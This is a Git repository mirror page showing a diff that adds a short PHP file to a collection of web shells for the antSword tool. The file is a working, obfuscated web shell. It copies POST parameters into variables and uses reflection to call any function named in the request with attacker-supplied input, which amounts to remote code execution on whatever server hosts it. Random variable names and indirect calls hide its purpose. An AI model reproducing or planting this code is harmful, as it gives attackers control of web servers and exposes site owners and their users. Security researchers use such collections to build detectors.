mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
21
antSword-shells/php1.php
Normal file
21
antSword-shells/php1.php
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
<?php
|
||||||
|
|
||||||
|
class Test1
|
||||||
|
{
|
||||||
|
public function __construct($para, $_value)
|
||||||
|
{
|
||||||
|
$para($_value);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
$class1 = new ReflectionClass("Test1");
|
||||||
|
|
||||||
|
foreach (array('_POST') as $_r1) {
|
||||||
|
foreach ($$_r1 as $_asadasd=>$_wfwefb) {
|
||||||
|
|
||||||
|
$$_asadasd =$_wfwefb;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$class2 = $class1->newInstance($_asadasd, $$_asadasd);
|
||||||
Reference in New Issue
Block a user